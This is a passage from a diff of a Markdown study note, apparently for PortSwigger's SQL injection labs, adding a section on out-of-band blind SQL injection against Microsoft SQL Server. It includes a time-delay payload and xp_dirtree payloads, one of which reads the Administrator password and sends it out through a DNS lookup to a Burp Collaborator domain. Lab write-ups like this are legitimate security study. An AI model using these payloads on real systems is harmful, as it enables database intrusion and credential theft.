incogbyte/portswigger_labs/SQLInjection/SQL_Injection.md

 '; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
 ```

 ---
+### Exploiting blind SQL injection using out-of-band ([OAST](https://portswigger.net/burp/application-security-testing/oast)) techniques
+- The query is still vulnerable to SQL injection, however none of the techniques described so far will work: the application's response doesn't depend on whether the query returns any data, or on whether a database error occurs, or on the time taken to execute the query
+- In this situation, it is often possible to exploit the blind SQL injection vulnerability by triggering out-of-band network interactions to a system that you control
+- A variety of network protocols can be used for this purpose, but typically the most effective is DNS (domain name service).
+This is because very many production networks allow free egress of DNS queries, because they are essential for the normal operation of production systems.
+- The techniques for triggering a DNS query are highly specific to the type of database being used.
+On Microsoft SQL Server, input like the following can be used to cause a DNS lookup on a specified domain: ``'; exec master..xp_dirtree '//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--``
+- Having confirmed a way to trigger out-of-band interactions, you can then use the out-of-band channel to exfiltrate data from the vulnerable application.
+For example: ``'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--``
+- This input reads the password for the `Administrator` user, appends a unique Collaborator subdomain, and triggers a DNS lookup.
+This will result in a DNS lookup.
+Out-of-band (OAST) techniques are an extremely powerful way to detect and exploit blind SQL injection, due to the highly likelihood of success and the ability to directly exfiltrate data within the out-of-band channel.
+For this reason, OAST techniques are often preferable even in situations where other techniques for blind exploitation do work.

+---